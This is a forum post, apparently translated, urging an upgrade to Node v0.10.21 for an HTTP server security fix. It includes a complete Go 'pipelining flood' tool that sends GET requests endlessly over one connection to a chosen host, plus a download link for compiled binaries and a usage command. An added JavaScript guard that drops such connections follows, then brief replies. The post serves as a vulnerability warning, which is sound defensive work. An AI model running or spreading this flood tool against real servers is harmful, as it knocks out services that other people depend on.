Reminder: update to Node v0.10.21 to guard against exploiters
Here is the official note:
This release contains a security fix for the http server implementation, please upgrade as soon as possible.
Please update as soon as you can. The test tool code is attached:
package main

/*
A simple pipelining flood for nodejs
Author pathletboy[at]gmail.com
Date 2013-10-18
*/

import (
	"flag"
	"log"
	"net"
)

func main() {
	host := flag.String("host", "", "specify the target")
	flag.Parse()
	if *host == "" {
		flag.PrintDefaults()
		return
	}
	var conn net.Conn
	var err error
	if conn, err = net.Dial("tcp", *host); err != nil {
		log.Fatal(err)
	}
	for {
		if _, err = conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + *host + "\r\nAccept: */*\r\n\r\n")); err != nil {
			log.Fatal(err)
		}
	}
}
Compiled binaries (win/linux)
http://pb.itsong.com/floodnode.7z
floodnode -host="xxx.com:xx"
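A server-side guard against the pattern the tool above exercises (requests pipelined on one connection while the responses go unread), given here as an added example that is not from the original post or from Node itself; upgrading remains the fix the release note calls for. The names `shouldDrop`, `createTracker` and `guard` and the threshold values are assumptions chosen for illustration.

```javascript
// Added example, not from the original post. Thresholds are assumed values.
const DEFAULTS = { maxPending: 16, maxBuffered: 1 << 20 }; // 16 requests, 1 MiB

// Pure policy check: too many unanswered requests on one socket, or too many
// response bytes queued because the peer is not reading.
function shouldDrop(pending, bufferedBytes, limits = DEFAULTS) {
  return pending > limits.maxPending || bufferedBytes > limits.maxBuffered;
}

// Per-socket count of requests whose response has not finished yet.
function createTracker() {
  const pending = new WeakMap();
  const bump = (sock, d) => {
    const n = Math.max(0, (pending.get(sock) || 0) + d);
    pending.set(sock, n);
    return n;
  };
  return { start: (s) => bump(s, 1), done: (s) => bump(s, -1), get: (s) => pending.get(s) || 0 };
}

// Wrap an http request handler; use as http.createServer(guard(handler)).
function guard(handler, limits = DEFAULTS, tracker = createTracker()) {
  return function guarded(req, res) {
    const sock = req.socket;
    const n = tracker.start(sock);
    let settled = false;
    const settle = () => {
      if (!settled) { settled = true; tracker.done(sock); }
    };
    res.once('finish', settle); // response fully handed to the OS
    res.once('close', settle);  // connection ended before that
    if (shouldDrop(n, sock.writableLength || 0, limits)) {
      sock.destroy(); // stop parsing further pipelined requests from this peer
      return false;
    }
    handler(req, res);
    return true;
  };
}
```

A well-behaved client that reads each response keeps its pending count near zero, so only connections that accumulate unanswered requests or unsent bytes are closed.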
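5 replies
== golang. Nicely hacked, OP (just kidding~)
There is a very simple piece of Node attack code; I'll post it in a few days. cnode was also attacked just now.
Could you explain it?
Updated.
Thanks for the heads-up.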